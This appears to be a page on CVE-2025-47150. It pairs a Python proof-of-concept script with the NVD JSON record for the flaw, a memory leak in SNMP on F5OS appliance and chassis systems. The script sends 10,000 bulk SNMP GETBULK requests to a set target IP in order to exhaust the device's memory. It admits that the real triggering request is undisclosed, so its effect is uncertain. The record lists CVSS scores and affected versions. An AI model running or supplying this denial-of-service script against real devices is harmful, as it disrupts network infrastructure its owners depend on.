CVE-2025-47150

# CVE-2025-47150 PoC - F5OS SNMP Memory Exhaustion # Description: This PoC demonstrates how to trigger memory exhaustion # in F5OS Appliance/Chassis systems via crafted SNMP requests. # Note: Requires valid low-privilege credentials. import socket import struct import time from pysnmp.hlapi import * # Target configuration TARGET_IP = "192.168.1.100" # F5OS device IP SNMP_PORT = 161 # Default SNMP port COMMUNITY = "public" # SNMP community string (low-priv) REQUESTS = 10000 # Number of malicious requests to send DELAY = 0.01 # Delay between requests (seconds) def craft_malicious_snmp_request(): """ Craft an SNMP request that triggers memory resource exhaustion in vulnerable F5OS systems. The exact request type is undisclosed, but OID traversal and bulk requests are known to trigger the issue. """ iterator = bulkCmd( SnmpEngine(), CommunityData(COMMUNITY, mpModel=1), # SNMPv2c UdpTransportTarget((TARGET_IP, SNMP_PORT)), ContextData(), 0, 50, # non-repeaters, max-repetitions (large value triggers mem issue) ObjectType(ObjectIdentity('1.3.6.1.2.1.1')), # system subtree ObjectType(ObjectIdentity('1.3.6.1.2.1.2')), # interfaces subtree ObjectType(ObjectIdentity('1.3.6.1.2.1.4')), # IP subtree lexicographicMode=False ) return iterator def exploit(): """ Main exploit loop: send bulk SNMP GETBULK requests to exhaust SNMP memory resources on the target F5OS device. """ print(f"[*] Targeting F5OS device: {TARGET_IP}") print(f"[*] Sending {REQUESTS} malicious SNMP requests...") for i in range(REQUESTS): try: errorIndication, errorStatus, errorIndex, varBinds = next( craft_malicious_snmp_request() ) if errorIndication: print(f"[!] Error at request {i}: {errorIndication}") elif errorStatus: print(f"[!] Status error at request {i}: {errorStatus.prettyPrint()}") except Exception as e: print(f"[!] Exception at request {i}: {e}") if i % 500 == 0: print(f"[*] Progress: {i}/{REQUESTS} requests sent") time.sleep(DELAY) print(f"[*] Exploit complete. Target SNMP memory should be exhausted.") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-47150", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:47.823", "lastModified": "2025-10-21T18:53:23.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When SNMP is configured on F5OS Appliance and Chassis systems, undisclosed requests can cause an increase in SNMP memory resource utilization.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:f5:f5os-a:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.5.1", "versionEndExcluding": "1.5.3", "matchCriteriaId": "4899125F-A896-487F-A2AC-803FFCF0C4FF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:f5:f5os-a:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.8.0", "versionEndExcluding": "1.8.3", "matchCriteriaId": "7A7C1C35-ECFA-4E9B-8B84-4D08E1501AAF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:f5:f5os-c:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.0", "versionEndExcluding": "1.6.4", "matchCriteriaId": "4C6DB709-3388-4DDF-A5A7-02C2D34D0104"}]}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K000149820", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}